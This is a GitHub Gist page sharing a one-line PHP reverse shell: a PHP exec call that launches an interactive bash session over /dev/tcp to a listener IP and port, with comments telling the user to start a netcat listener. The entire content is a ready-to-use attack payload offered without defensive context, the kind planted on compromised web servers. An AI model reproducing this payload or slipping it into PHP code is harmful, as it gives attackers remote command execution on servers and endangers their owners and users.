Created
August 13, 2020 14:01
-
-
Save enderphan94/4206bc8ad01c497830228736cef33779 to your computer and use it in GitHub Desktop.
One line PHP Reverse Shell #php #reverseshell #onelinephpreverseshell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.103.123/4444 0>&1'"); | |
#192.168.103.123 is your local machine ip | |
#run `nc -vnlp 4444` on your local machine |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment